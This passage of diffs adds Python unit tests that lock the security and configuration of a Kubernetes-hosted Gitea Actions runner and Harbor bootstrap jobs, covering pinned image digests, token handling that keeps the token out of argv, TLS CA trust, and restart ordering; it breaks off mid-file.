+    DinD sidecar or `privileged: true`), registered at instance scope;
+  * the registration token travels stdin/readback into a dedicated Secret,
+    consumed by the runner via a mounted file (GITEA_RUNNER_REGISTRATION_TOKEN_FILE),
+    never a literal in argv/env/manifest;
+  * resume-stability: the runner's own `.runner` registration state persists
+    on a PersistentVolumeClaim (not emptyDir), and this platform explicitly
+    re-verifies the runner is online every run, not just once;
+  * Argo inventory/wave placement consistent with the rest of the platform;
+  * both the act_runner and DinD-capable image, plus the CI job-runtime
+    image the generated workflow's `ubuntu-latest` label resolves to, are
+    pinned by immutable registry digest -- confirmed 2026-07-22 via
+    registry-1.docker.io's `docker-content-digest` response header;
+  * the exact Gitea Admin API this platform's actually-pinned Gitea version
+    (chart 12.6.0 / appVersion 1.26.1 -- apps/platform/gitea.yaml) exposes:
+    `POST /api/v1/admin/actions/runners/registration-token` (confirmed
+    against go-gitea/gitea's templates/swagger/v1_json.tmpl at tag v1.26.1;
+    the older v1.23 `GET /api/v1/admin/runners/registration-token` no
+    longer exists on this chart's pinned appVersion).
+
+Run:
+    python3 platform/tests/test_gitea_actions_runner.py
+"""
+
+import os
+import sys
+import unittest
+
+try:
+    import yaml
+except ImportError:  # pragma: no cover - environment guard
+    sys.stderr.write("PyYAML is required: pip install pyyaml\n")
+    raise
+
+REPO_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
+SETUP = os.path.join(REPO_ROOT, "scripts", "local-setup.nu")
+APP = os.path.join(REPO_ROOT, "apps", "platform", "gitea-actions-runner.yaml")
+RUNNER_DIR = os.path.join(REPO_ROOT, "platform", "base", "gitea-actions-runner")
+
+ACT_RUNNER_IMAGE_DIGEST = (
+    "gitea/act_runner:0.6.1-dind-rootless"
+    "@sha256:6b8f7c4297c0a5c4c181e4737665d4af69288cdc380e2887105a05a2b78930df"
+)
+CI_JOB_IMAGE_DIGEST = (
+    "catthehacker/ubuntu:act-latest"
+    "@sha256:3220992391c1182a0cfe4c64453511772c54f4c39e960d26a5e327960675982e"
+)
+
+
+def _read(path):
+    with open(path, encoding="utf-8") as fh:
+        return fh.read()
+
+
+def _func_body(text, name):
+    start = text.index(f"def {name} ")
+    end = text.index("\ndef ", start + 10)
+    return text[start:end]
+
+
+def _yaml_docs(path):
+    return [d for d in yaml.safe_load_all(_read(path)) if d]
+
+
+class SetupTextFixture(unittest.TestCase):
+    @classmethod
+    def setUpClass(cls):
+        cls.text = _read(SETUP)
+
+
+class RunnerArgoApplicationTest(unittest.TestCase):
+    @classmethod
+    def setUpClass(cls):
+        with open(APP, encoding="utf-8") as fh:
+            cls.app = yaml.safe_load(fh)
+
+    def test_application_exists_and_targets_the_runner_manifests(self):
+        self.assertEqual(self.app["kind"], "Application")
+        self.assertEqual(self.app["spec"]["source"]["path"], "platform/base/gitea-actions-runner")
+
+    def test_destination_is_the_gitea_namespace(self):
+        self.assertEqual(self.app["spec"]["destination"]["namespace"], "gitea")
+
+    def test_automated_sync_is_enabled(self):
+        self.assertIn("automated", self.app["spec"]["syncPolicy"])
+
+    def test_syncs_after_gitea_itself(self):
+        gitea_wave = int(
+            yaml.safe_load(_read(os.path.join(REPO_ROOT, "apps", "platform", "gitea.yaml")))
+            ["metadata"]["annotations"]["argocd.argoproj.io/sync-wave"]
+        )
+        runner_wave = int(self.app["metadata"]["annotations"]["argocd.argoproj.io/sync-wave"])
+        self.assertGreater(runner_wave, gitea_wave)
+
+
+class RunnerManifestsTest(unittest.TestCase):
+    @classmethod
+    def setUpClass(cls):
+        cls.docs = []
+        for name in os.listdir(RUNNER_DIR):
+            if name.endswith(".yaml") and name != "kustomization.yaml":
+                cls.docs.extend(_yaml_docs(os.path.join(RUNNER_DIR, name)))
+        cls.by_kind = {}
+        for d in cls.docs:
+            cls.by_kind.setdefault(d["kind"], []).append(d)
+
+    def test_kustomization_lists_every_manifest(self):
+        kustom = yaml.safe_load(_read(os.path.join(RUNNER_DIR, "kustomization.yaml")))
+        listed = set(kustom["resources"])
+        on_disk = {
+            f for f in os.listdir(RUNNER_DIR) if f.endswith(".yaml") and f != "kustomization.yaml"
+        }
+        self.assertEqual(listed, on_disk)
+
+    def test_deployment_exists_with_single_replica(self):
+        self.assertEqual(len(self.by_kind.get("Deployment", [])), 1)
+        deploy = self.by_kind["Deployment"][0]
+        self.assertEqual(deploy["spec"]["replicas"], 1)
+
+    def _container(self):
+        deploy = self.by_kind["Deployment"][0]
+        return deploy["spec"]["template"]["spec"]["containers"][0]
+
+    def test_act_runner_image_is_pinned_by_digest(self):
+        c = self._container()
+        self.assertEqual(c["image"], ACT_RUNNER_IMAGE_DIGEST)
+
+    def test_image_is_not_a_floating_tag(self):
+        c = self._container()
+        self.assertIn("@sha256:", c["image"])
+
+    def test_ci_job_runtime_image_label_is_pinned_by_digest(self):
+        c = self._container()
+        env = {e["name"]: e for e in c["env"]}
+        self.assertIn("GITEA_RUNNER_LABELS", env)
+        self.assertIn(CI_JOB_IMAGE_DIGEST, env["GITEA_RUNNER_LABELS"]["value"])
+
+    def test_instance_url_is_the_trusted_ingress_over_https(self):
+        # Issue #285 TLS hardening: the runner's own registration/task-fetch
+        # calls to Gitea now go through the trusted digiorg.local ingress
+        # (CA: cert-manager/digiorg-local-ca-secret), not the raw in-cluster
+        # Service address over plain HTTP.
+        c = self._container()
+        env = {e["name"]: e for e in c["env"]}
+        self.assertEqual(env["GITEA_INSTANCE_URL"]["value"], "https://digiorg.local/gitea")
+
+    def test_runner_trusts_the_ca_via_ssl_cert_file(self):
+        c = self._container()
+        env = {e["name"]: e for e in c["env"]}
+        self.assertIn("SSL_CERT_FILE", env)
+        self.assertTrue(env["SSL_CERT_FILE"]["value"].startswith("/"))
+
+    def test_ca_is_mounted_for_the_runner_and_for_the_embedded_dockerd_registry_trust(self):
+        # Two mounts of the same CA secret volume: one at the generic path
+        # SSL_CERT_FILE points to (the runner's own HTTPS calls), and one at
+        # Docker's registry-specific trust convention
+        # (/etc/docker/certs.d/<registry-host>/ca.crt) so the embedded
+        # rootless dockerd trusts the digiorg.local registry without
+        # insecureSkipVerify.
+        c = self._container()
+        env = {e["name"]: e for e in c["env"]}
+        mount_paths = {vm["mountPath"] for vm in c["volumeMounts"]}
+        self.assertIn(env["SSL_CERT_FILE"]["value"].rsplit("/", 1)[0], mount_paths)
+        self.assertIn("/etc/docker/certs.d/digiorg.local", mount_paths)
+
+    def test_config_file_env_points_at_a_mounted_act_runner_config(self):
+        # act_runner v0.6.1's entrypoint (scripts/run.sh) only passes
+        # --config when CONFIG_FILE is set; without it there is no way to
+        # set container.options (used below to mount the CA into every
+        # ephemeral job container).
+        c = self._container()
+        env = {e["name"]: e for e in c["env"]}
+        self.assertIn("CONFIG_FILE", env)
+        config_path = env["CONFIG_FILE"]["value"]
+        mount_paths = {vm["mountPath"]: vm for vm in c["volumeMounts"]}
+        self.assertTrue(any(config_path.startswith(p) for p in mount_paths))
+
+    def test_act_runner_config_disables_insecure_and_trusts_ca_in_job_containers(self):
+        configmaps = self.by_kind.get("ConfigMap", [])
+        config_docs = [
+            cm for cm in configmaps if "config.yaml" in (cm.get("data") or {})
+        ]
+        self.assertEqual(len(config_docs), 1, "expected exactly one act_runner config ConfigMap")
+        config_yaml = yaml.safe_load(config_docs[0]["data"]["config.yaml"])
+        self.assertIs(config_yaml["runner"]["insecure"], False)
+        container_options = config_yaml["container"]["options"]
+        self.assertIn("--volume", container_options)
+        self.assertNotIn("insecureSkipVerify", container_options)
+
+    def test_registration_token_is_mounted_as_a_file_not_a_raw_env_value(self):
+        c = self._container()
+        env_names = {e["name"] for e in c["env"]}
+        # Never the direct-value env var form -- only the *_FILE indirection,
+        # which the official act_runner entrypoint reads from a mounted Secret.
+        self.assertNotIn("GITEA_RUNNER_REGISTRATION_TOKEN", env_names)
+        self.assertIn("GITEA_RUNNER_REGISTRATION_TOKEN_FILE", env_names)
+        volume_mounts = c["volumeMounts"]
+        token_mount = next(
+            vm for vm in volume_mounts if vm["mountPath"] in
+            {"/run/secrets/gitea-actions-runner"}
+        )
+        self.assertTrue(token_mount.get("readOnly"))
+
+    def test_registration_token_volume_sources_the_dedicated_secret(self):
+        deploy = self.by_kind["Deployment"][0]
+        volumes = deploy["spec"]["template"]["spec"]["volumes"]
+        token_volume = next(v for v in volumes if "secret" in v)
+        self.assertEqual(token_volume["secret"]["secretName"], "gitea-actions-runner-token")
+
+    def test_data_directory_is_a_persistent_volume_not_emptydir(self):
+        # act_runner's own `.runner` registration state lives under /data;
+        # only a PVC survives pod restarts, which is what makes registration
+        # resume-stable (Issue #285 blocker #4: "resume-stable registration
+        # token").
+        deploy = self.by_kind["Deployment"][0]
+        volumes = deploy["spec"]["template"]["spec"]["volumes"]
+        data_volume = next(v for v in volumes if v["name"] == "data")
+        self.assertIn("persistentVolumeClaim", data_volume)
+        self.assertNotIn("emptyDir", data_volume)
+        self.assertEqual(len(self.by_kind.get("PersistentVolumeClaim", [])), 1)
+
+    def test_runner_container_is_privileged(self):
+        # gitea/act_runner:0.6.1-dind-rootless still needs `privileged: true`
+        # in Kubernetes: the rootless dockerd inside it sets up user/mount
+        # namespaces (newuidmap/newgidmap, unshare/clone CLONE_NEWUSER) that
+        # every non-privileged securityContext combination (capabilities,
+        # seccompProfile, allowPrivilegeEscalation alone) fails to permit in
+        # this cluster's default PSA/seccomp posture. Confirmed against the
+        # upstream gitea/runner official Kubernetes example
+        # (examples/kubernetes/rootless-docker.yaml @ gitea.com/gitea/runner
+        # main), whose runner container securityContext is exactly
+        # `privileged: true` and nothing else.
+        c = self._container()
+        sc = c["securityContext"]
+        self.assertIs(sc.get("privileged"), True)
+
+    def test_no_contradictory_hardening_alongside_privileged(self):
+        # `capabilities.drop`, `seccompProfile`, `allowPrivilegeEscalation`
+        # and `runAsNonRoot` are meaningless-to-misleading on a
+        # `privileged: true` container (a privileged container is granted
+        # every capability and an unconfined seccomp profile by the
+        # container runtime regardless of what's declared here -- see
+        # kubernetes/kubernetes securitycontext validation and containerd's
+        # WithPrivileged spec opts). Declaring them anyway falsely implies
+        # this container is still confined the way the pre-fix version
+        # claimed. The upstream gitea/runner official example sets none of
+        # them.
+        c = self._container()
+        sc = c["securityContext"]
+        self.assertNotIn("capabilities", sc)
+        self.assertNotIn("seccompProfile", sc)
+        self.assertNotIn("allowPrivilegeEscalation", sc)
+        self.assertNotIn("runAsNonRoot", sc)
+
+    def test_trust_boundary_is_documented_on_the_deployment(self):
+        # Issue #285 blocker #4: a privileged pod is a distinct trust
+        # boundary from every per-app namespace this same platform creates
+        # for AppClaims (namespaceObj in core-catalog's pipeline.yaml) --
+        # those are never privileged. The manifest must say so in-repo, next
+        # to the grant, not only in a PR description.
+        text = _read(os.path.join(RUNNER_DIR, "deployment.yaml"))
+        lowered = text.lower()
+        self.assertIn("privileged", lowered)
+        self.assertIn("trust boundary", lowered)
+        self.assertIn("gitea", lowered)
+
+    def test_no_dangling_kyverno_policy_exception_is_introduced(self):
+        # No cluster-wide privileged/PSA-restricting Kyverno ClusterPolicy
+        # currently exists in this platform (policies/kyverno/), so a
+        # PolicyException resource here would reference a nonexistent
+        # policy -- dead configuration. If such a policy is ever added, its
+        # exception must be scoped to exactly this Deployment's pods in the
+        # `gitea` namespace, never broader; that is enforced by review, not
+        # by a speculative resource today.
+        policy_dir = os.path.join(REPO_ROOT, "policies", "kyverno")
+        exception_names = set()
+        for root, _dirs, files in os.walk(policy_dir):
+            for name in files:
+                if not name.endswith(".yaml"):
+                    continue
+                for doc in _yaml_docs(os.path.join(root, name)):
+                    if doc.get("kind") == "ClusterPolicy":
+                        exception_names.add(doc["metadata"]["name"])
+        self.assertEqual(self.by_kind.get("PolicyException", []), [])
+        for doc in self.docs:
+            self.assertNotEqual(doc.get("kind"), "PolicyException")
+
+
+class RegistrationTokenNeverInRegisterArgvTest(unittest.TestCase):
+    """act_runner v0.6.1's own stock entrypoint (gitea.com/gitea/runner
+    scripts/run.sh @ that tag) reads GITEA_RUNNER_REGISTRATION_TOKEN_FILE into
+    an env var and then passes it as `act_runner register --token <value>` --
+    a literal argv value, visible via `ps`/`/proc/<pid>/cmdline` to anything
+    with exec access to the container for the life of that subprocess. The
+    fix replaces that stock entrypoint (mounted over
+    /usr/local/bin/run.sh, which the image's s6-supervised act_runner
+    service execs by name) with a custom script that feeds the token to
+    act_runner's *interactive* register path on stdin instead -- verified
+    against internal/app/cmd/register.go @ v0.6.1: omitting --no-interactive
+    and --token drops into registerInteractive, which only prompts (reads
+    stdin) for a stage whose value is still empty; pre-filling
+    --instance/--name/--labels as flags means the token is the only stdin
+    prompt reached.
+    """
+
+    @classmethod
+    def setUpClass(cls):
+        cls.configmap = yaml.safe_load(_read(os.path.join(RUNNER_DIR, "configmap.yaml")))
+        cls.deploy_docs = [
+            d for d in _yaml_docs(os.path.join(RUNNER_DIR, "deployment.yaml"))
+            if d["kind"] == "Deployment"
+        ]
+        cls.container = cls.deploy_docs[0]["spec"]["template"]["spec"]["containers"][0]
+
+    def _entrypoint_script(self):
+        return self.configmap["data"]["run.sh"]
+
+    def test_configmap_carries_a_custom_entrypoint_script(self):
+        self.assertIn("run.sh", self.configmap["data"])
+
+    def test_entrypoint_never_passes_token_flag_to_register(self):
+        script = self._entrypoint_script()
+        self.assertIn("act_runner register", script)
+        for line in script.splitlines():
+            if "act_runner register" in line or "--token" in line:
+                self.assertNotIn("--token", line, f"--token flag found in: {line!r}")
+
+    def test_entrypoint_never_sets_the_raw_token_env_var(self):
+        script = self._entrypoint_script()
+        self.assertNotIn("GITEA_RUNNER_REGISTRATION_TOKEN=", script)
+        self.assertNotIn("GITEA_RUNNER_REGISTRATION_TOKEN}", script)
+
+    def test_entrypoint_never_runs_register_no_interactive(self):
+        # --no-interactive forces the token-as-flag path (registerNoInteractive
+        # requires --token); the fix depends on the interactive path instead.
+        script = self._entrypoint_script()
+        self.assertNotIn("--no-interactive", script)
+
+    def test_entrypoint_pipes_the_token_file_into_register_stdin(self):
+        script = self._entrypoint_script()
+        found = False
+        for line in script.splitlines():
+            if "act_runner register" in line and "|" in line.split("act_runner register")[0]:
+                self.assertIn("GITEA_RUNNER_REGISTRATION_TOKEN_FILE", line)
+                found = True
+        self.assertTrue(found, "expected a `... | act_runner register ...` pipeline reading the token file")
+
+    def test_entrypoint_preserves_idempotent_registration_state_check(self):
+        script = self._entrypoint_script()
+        self.assertIn(".runner", script)
+        self.assertRegex(script, r"\[\[\s*!\s*-s\s*\"?\$RUNNER_STATE_FILE\"?\s*\]\]")
+
+    def test_entrypoint_still_execs_the_daemon(self):
+        script = self._entrypoint_script()
+        self.assertIn("exec act_runner daemon", script)
+
+    def test_run_sh_is_mounted_over_the_images_stock_entrypoint(self):
+        mounts = [
+            vm for vm in self.container["volumeMounts"]
+            if vm["mountPath"] == "/usr/local/bin/run.sh"
+        ]
+        self.assertEqual(len(mounts), 1, "expected exactly one volumeMount overriding run.sh")
+        mount = mounts[0]
+        self.assertEqual(mount.get("subPath"), "run.sh")
+        self.assertTrue(mount.get("readOnly"))
+
+    def test_mounted_run_sh_is_executable(self):
+        deploy = self.deploy_docs[0]
+        volumes = deploy["spec"]["template"]["spec"]["volumes"]
+        config_volume = next(v for v in volumes if v["name"] == "act-runner-config")
+        items = config_volume["configMap"]["items"]
+        run_sh_item = next(i for i in items if i["key"] == "run.sh")
+        self.assertEqual(run_sh_item.get("mode"), 0o755)
+
+
+class ConfigureGiteaActionsRunnerSetupTest(SetupTextFixture):
+    def test_functions_are_defined_exactly_once(self):
+        for name in ("configure_gitea_actions_runner", "wait_for_gitea_actions_runner_online"):
+            self.assertEqual(self.text.count(f"def {name} ["), 1, f"{name} must be defined once")
+
+    def test_configure_gitea_calls_it_after_backstage_publisher(self):
+        body = _func_body(self.text, "configure_gitea")
+        self.assertIn("configure_gitea_actions_runner", body)
+        self.assertLess(
+            body.index("configure_backstage_gitea_publisher"),
+            body.index("configure_gitea_actions_runner"),
+        )
+
+    def test_uses_the_gitea_1_26_admin_api_not_the_stale_v1_23_path(self):
+        body = _func_body(self.text, "configure_gitea_actions_runner")
+        self.assertIn("/api/v1/admin/actions/runners/registration-token", body)
+        self.assertNotIn("/api/v1/admin/runners/registration-token", body)
+
+    def test_registration_token_never_appears_in_argv_only_stdin(self):
+        body = _func_body(self.text, "configure_gitea_actions_runner")
+        import re
+
+        for match in re.finditer(r"curl[^\n']*", body):
+            self.assertNotIn('-H "Authorization', match.group(0))
+
+    def test_token_generation_is_resume_preserved(self):
+        body = _func_body(self.text, "configure_gitea_actions_runner")
+        self.assertIn("secret_exists", body)
+
+    def test_online_verification_runs_unconditionally_every_run(self):
+        # Unlike token generation (resume-preserved), coming online must be
+        # re-verified even when the Secret already existed -- a stale/expired
+        # token or a crash-looping runner must still fail this run closed.
+        body = _func_body(self.text, "configure_gitea_actions_runner")
+        call_index = body.index("wait_for_gitea_actions_runner_online")
+        # The call must not be nested inside the `if not $secret_exists {`
+        # branch -- i.e. it must appear after that branch's closing brace at
+        # the function's own indentation level, not gated by it.
+        branch_start = body.index("if not $secret_exists {")
+        branch_body_start = body.index("{", branch_start) + 1
+        depth = 1
+        i = branch_body_start
+        while depth > 0 and i < len(body):
+            if body[i] == "{":
+                depth += 1
+            elif body[i] == "}":
+                depth -= 1
+            i += 1
+        branch_end = i
+        self.assertGreater(
+            call_index,
+            branch_end,
+            "online verification must run after the token-generation branch closes, unconditionally",
+        )
+
+    def test_wait_for_online_fails_closed_on_timeout(self):
+        body = _func_body(self.text, "wait_for_gitea_actions_runner_online")
+        self.assertIn("error make", body)
+        self.assertIn("did not come online", body)
+
+    def test_wait_for_online_accepts_only_the_explicit_online_status(self):
+        # Gitea's Admin API only ever emits "status": "online" or "offline"
+        # for a runner (verified against services/convert/convert.go's
+        # ToActionRunner @ go-gitea/gitea v1.26.1: apiStatus is hardcoded to
+        # "offline" unless runner.IsOnline(), never any other string). Any
+        # other value -- including this script's own "unknown" fallback for
+        # a missing/malformed `status` field -- must NOT be treated as
+        # ready; only the literal "online" may satisfy readiness.
+        body = _func_body(self.text, "wait_for_gitea_actions_runner_online")
+        self.assertIn('$status == "online"', body)
+        self.assertNotIn('$status != "offline"', body)
+
+    def test_wait_for_online_does_not_return_early_on_unknown_status(self):
+        body = _func_body(self.text, "wait_for_gitea_actions_runner_online")
+        # The success path (`return` before the loop's final error make) must
+        # be reachable only via the explicit "online" acceptance check, not
+        # via a bare `if $status != "offline"` that a missing/garbled field
+        # (defaulted to "unknown") would also satisfy.
+        return_index = body.index("return")
+        preceding = body[:return_index]
+        self.assertIn('$status == "online"', preceding)
+
+
+class CaRotationRunnerRestartOrderingTest(SetupTextFixture):
+    """Issue #285 core review: on a resumed `up` run where the digiorg.local
+    CA content changed, the previous ordering called configure_gitea (which
+    calls configure_gitea_actions_runner -> wait_for_gitea_actions_runner_online)
+    BEFORE restarting the runner Deployment. An already-running runner pod's
+    cached TLS trust does not pick up a rotated CA without a restart, so
+    wait_for_gitea_actions_runner_online would poll a runner that can never
+    reconnect to Gitea's now-differently-trusted endpoint -- a deadlock that
+    only resolves after wait_for_gitea_actions_runner_online times out and
+    the (too-late) restart finally runs. The fix restarts the runner
+    immediately once a CA change is detected, before configure_gitea runs."""
+
+    def test_gitea_ca_changed_restart_happens_before_configure_gitea(self):
+        body = _func_body(self.text, '"main up"')
+        restart_call = 'restart_oidc_deployment_if_present "gitea" "gitea-actions-runner"'
+        self.assertIn(restart_call, body)
+        self.assertIn("configure_gitea", body)
+        restart_idx = body.index(restart_call)
+        # Find configure_gitea called as its own statement (not the longer
+        # configure_gitea_actions_runner identifier, which only appears
+        # inside configure_gitea's own definition elsewhere in the file).
+        configure_gitea_idx = body.index("\n    configure_gitea\n")
+        self.assertLess(
+            restart_idx,
+            configure_gitea_idx,
+            "the gitea-actions-runner restart on CA change must run before configure_gitea, "
+            "otherwise wait_for_gitea_actions_runner_online deadlocks against the stale CA",
+        )
+
+    def test_restart_is_still_gated_on_the_ca_actually_changing(self):
+        body = _func_body(self.text, '"main up"')
+        restart_call = 'restart_oidc_deployment_if_present "gitea" "gitea-actions-runner"'
+        gate_idx = body.index("if $gitea_ca_changed {")
+        restart_idx = body.index(restart_call)
+        self.assertLess(
+            gate_idx, restart_idx,
+            "the restart must remain conditional on gitea_ca_changed, not unconditional",
+        )
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/platform/tests/test_gitea_actions_runner.py
+++ b/platform/tests/test_gitea_actions_runner.py
@@ -497,7 +497,7 @@ class CaRotationRunnerRestartOrderingTest(SetupTextFixture):
     def test_restart_is_still_gated_on_the_ca_actually_changing(self):
         body = _func_body(self.text, '"main up"')
         restart_call = 'restart_oidc_deployment_if_present "gitea" "gitea-actions-runner"'
-        gate_idx = body.index("if $gitea_ca_changed {")
+        gate_idx = body.index("if $gitea_ca_changed and $runner_token_exists {")
         restart_idx = body.index(restart_call)
         self.assertLess(
             gate_idx, restart_idx,

--- a/platform/tests/test_gitea_actions_runner.py
+++ b/platform/tests/test_gitea_actions_runner.py
@@ -6,9 +6,9 @@ actually execute.
 
 Locks:
   * a pinned, functional act_runner Deployment (official gitea/act_runner
-    dind-rootless image -- a single container bundling act_runner + a
-    rootless dockerd, so CI jobs can build/push images without a separate
-    DinD sidecar or `privileged: true`), registered at instance scope;
+    dind image -- a single privileged trust-boundary container bundling
+    act_runner + dockerd, so CI jobs can build/push images without a separate
+    DinD sidecar or host Docker socket), registered at instance scope;
   * the registration token travels stdin/readback into a dedicated Secret,
     consumed by the runner via a mounted file (GITEA_RUNNER_REGISTRATION_TOKEN_FILE),
     never a literal in argv/env/manifest;
@@ -47,8 +47,8 @@ APP = os.path.join(REPO_ROOT, "apps", "platform", "gitea-actions-runner.yaml")
 RUNNER_DIR = os.path.join(REPO_ROOT, "platform", "base", "gitea-actions-runner")
 
 ACT_RUNNER_IMAGE_DIGEST = (
-    "gitea/act_runner:0.6.1-dind-rootless"
-    "@sha256:6b8f7c4297c0a5c4c181e4737665d4af69288cdc380e2887105a05a2b78930df"
+    "gitea/act_runner:0.6.1-dind"
+    "@sha256:578925b4bdec5f60d93b5ba766cf02f2f9f32b1c8a4ec665ddf4d53d45f683c7"
 )
 CI_JOB_IMAGE_DIGEST = (
     "catthehacker/ubuntu:act-latest"
@@ -164,7 +164,7 @@ class RunnerManifestsTest(unittest.TestCase):
         # SSL_CERT_FILE points to (the runner's own HTTPS calls), and one at
         # Docker's registry-specific trust convention
         # (/etc/docker/certs.d/<registry-host>/ca.crt) so the embedded
-        # rootless dockerd trusts the digiorg.local registry without
+        # embedded dockerd trusts the digiorg.local registry without
         # insecureSkipVerify.
         c = self._container()
         env = {e["name"]: e for e in c["env"]}
@@ -229,15 +229,12 @@ class RunnerManifestsTest(unittest.TestCase):
         self.assertEqual(len(self.by_kind.get("PersistentVolumeClaim", [])), 1)
 
     def test_runner_container_is_privileged(self):
-        # gitea/act_runner:0.6.1-dind-rootless still needs `privileged: true`
-        # in Kubernetes: the rootless dockerd inside it sets up user/mount
-        # namespaces (newuidmap/newgidmap, unshare/clone CLONE_NEWUSER) that
-        # every non-privileged securityContext combination (capabilities,
-        # seccompProfile, allowPrivilegeEscalation alone) fails to permit in
-        # this cluster's default PSA/seccomp posture. Confirmed against the
-        # upstream gitea/runner official Kubernetes example
-        # (examples/kubernetes/rootless-docker.yaml @ gitea.com/gitea/runner
-        # main), whose runner container securityContext is exactly
+        # The official DinD variant needs `privileged: true` in Kubernetes so
+        # its embedded dockerd can create the nested container namespaces and
+        # mounts. Confirmed against the upstream gitea/runner Kubernetes
+        # example. The previous rootless variant still required this same
+        # privilege while also depending on host user-namespace policy.
+        # examples, whose runner container securityContext is exactly
         # `privileged: true` and nothing else.
         c = self._container()
         sc = c["securityContext"]

--- a/platform/tests/test_harbor_api_tls.py
+++ b/platform/tests/test_harbor_api_tls.py
@@ -1,0 +1,52 @@
+#!/usr/bin/env python3
+"""TLS contract for credential-bearing Harbor PostSync API jobs."""
+
+from pathlib import Path
+import unittest
+import yaml
+
+ROOT = Path(__file__).resolve().parents[2]
+OIDC = ROOT / "platform/base/harbor/harbor-oidc-config-job.yaml"
+PROXY = ROOT / "platform/base/harbor/harbor-proxy-cache-job.yaml"
+SETUP = ROOT / "scripts/local-setup.nu"
+
+
+class HarborPostSyncTlsTest(unittest.TestCase):
+    def _doc_and_script(self, path):
+        doc = yaml.safe_load(path.read_text())
+        pod = doc["spec"]["template"]["spec"]
+        container = pod["containers"][0]
+        return pod, container, container["command"][2]
+
+    def test_bootstrap_distributes_public_ca_to_harbor(self):
+        source = SETUP.read_text()
+        self.assertIn('copy_digiorg_local_ca_to_namespace "harbor"', source)
+
+    def test_both_jobs_use_verified_ingress_tls(self):
+        for path in (OIDC, PROXY):
+            with self.subTest(path=path.name):
+                _, _, script = self._doc_and_script(path)
+                self.assertIn('HARBOR_API="https://digiorg.local/api/v2.0"', script)
+                self.assertNotIn("http://harbor", script)
+                self.assertNotRegex(script, r"\bcurl\b[^\n]*(?:\s-k(?:\s|$)|--insecure)")
+                self.assertRegex(
+                    script,
+                    r'--cacert (?:/etc/digiorg-ca/ca\.crt|"\$\{CA_CERT\}")',
+                )
+
+    def test_both_jobs_wait_for_optional_public_ca_mount(self):
+        for path in (OIDC, PROXY):
+            with self.subTest(path=path.name):
+                pod, container, script = self._doc_and_script(path)
+                mount = next(m for m in container["volumeMounts"] if m["name"] == "digiorg-local-ca")
+                self.assertEqual(mount["mountPath"], "/etc/digiorg-ca")
+                self.assertTrue(mount["readOnly"])
+                volume = next(v for v in pod["volumes"] if v["name"] == "digiorg-local-ca")
+                self.assertEqual(volume["secret"]["secretName"], "digiorg-local-ca")
+                self.assertTrue(volume["secret"]["optional"])
+                self.assertIn("/etc/digiorg-ca/ca.crt", script)
+                self.assertIn("until [ -s", script)
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/platform/tests/test_harbor_bootstrap_crash_safety.py
+++ b/platform/tests/test_harbor_bootstrap_crash_safety.py
@@ -1,0 +1,201 @@
+#!/usr/bin/env python3
+"""Issue #285 runtime blockers for the declarative Harbor bootstrap Request
+(`crossplane/bootstrap/harbor-robot-request.yaml`).
+
+Blocker A -- secret preservation: Harbor's `GET /robots/{id}` (and, after
+this fix, `GET /robots` LIST) responses never carry the robot's `secret`
+field (confirmed against goharbor/harbor v2.15.1's
+`src/server/v2.0/handler/robot.go` -- only `CreateRobot`'s response
+populates it). provider-http v1.0.14's `KeyInjection.MissingFieldStrategy`
+defaults to `"delete"`, so every OBSERVE reconcile after the first would
+wipe the already-injected `secret`/`basicAuth` keys from
+`crossplane-harbor-credentials`. This locks `missingFieldStrategy:
+preserve` on every keyMapping fed by a field the OBSERVE response omits.
+
+Blocker B -- crash-safe identity: the previous OBSERVE mapping resolved the
+robot purely via a numeric ID cached from a prior CREATE response
+(`.response.body.id`). If this Request's `.status` is ever lost (deleted
+and recreated after Harbor already accepted the CREATE POST), that cached
+ID is gone. Unlike the per-app project-level robot (core-catalog's
+pipeline Composition), Harbor's `GET /robots` LIST endpoint defaults to
+system-level scope (`ProjectID=0`) whenever the `Level` query keyword is
+omitted (confirmed via `ListRobot` in the same handler file) -- exactly
+this bootstrap robot's own level, with no numeric project ID required.
+This locks a LIST-based OBSERVE mapping (`GET /robots?q=Name=~...`) plus
+CUSTOM `isRemovedCheck`/`expectedResponseCheck` that independently
+rediscover the robot from its declared name/level/permissions alone,
+never relying on any previously cached response.
+
+Run:
+    python3 platform/tests/test_harbor_bootstrap_crash_safety.py
+"""
+
+import json
+import os
+import subprocess
+import sys
+import unittest
+
+try:
+    import yaml
+except ImportError:  # pragma: no cover - environment guard
+    sys.stderr.write("PyYAML is required: pip install pyyaml\n")
+    raise
+
+REPO_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
+HARBOR_REQUEST = os.path.join(REPO_ROOT, "crossplane", "bootstrap", "harbor-robot-request.yaml")
+
+
+def _load():
+    with open(HARBOR_REQUEST, encoding="utf-8") as fh:
+        return yaml.safe_load(fh)
+
+
+def _run_jq(logic, doc):
+    proc = subprocess.run(
+        ["jq", "-c", logic], input=json.dumps(doc), capture_output=True, text=True, timeout=10
+    )
+    if proc.returncode != 0:
+        raise AssertionError("jq failed for logic=%r: %s" % (logic, proc.stderr))
+    return json.loads(proc.stdout)
+
+
+class SecretPreservationTest(unittest.TestCase):
+    @classmethod
+    def setUpClass(cls):
+        cls.doc = _load()
+        cls.injections = cls.doc["spec"]["forProvider"]["secretInjectionConfigs"]
+
+    def test_every_key_mapping_preserves_on_missing_field(self):
+        self.assertEqual(len(self.injections), 1)
+        for mapping in self.injections[0]["keyMappings"]:
+            self.assertEqual(
+                mapping.get("missingFieldStrategy"),
+                "preserve",
+                "%s must preserve (not delete) on a response that omits it" % mapping["secretKey"],
+            )
+
+    def test_name_secret_basicauth_keys_still_present(self):
+        keys = {m["secretKey"] for m in self.injections[0]["keyMappings"]}
+        self.assertEqual(keys, {"name", "secret", "basicAuth"})
+
+
+class ListBasedObserveTest(unittest.TestCase):
+    @classmethod
+    def setUpClass(cls):
+        cls.doc = _load()
+        cls.forProvider = cls.doc["spec"]["forProvider"]
+        cls.mappings = cls.forProvider["mappings"]
+
+    def test_observe_mapping_is_a_list_query_not_id_based(self):
+        observe = next(m for m in self.mappings if m.get("action") == "OBSERVE")
+        self.assertEqual(observe["method"], "GET")
+        self.assertNotIn(".response.body.id", observe["url"])
+        self.assertIn("/robots", observe["url"])
+        self.assertIn("crossplane-system", observe["url"])
+
+    def test_expected_response_check_is_custom(self):
+        self.assertEqual(self.forProvider["expectedResponseCheck"]["type"], "CUSTOM")
+
+    def test_is_removed_check_is_custom(self):
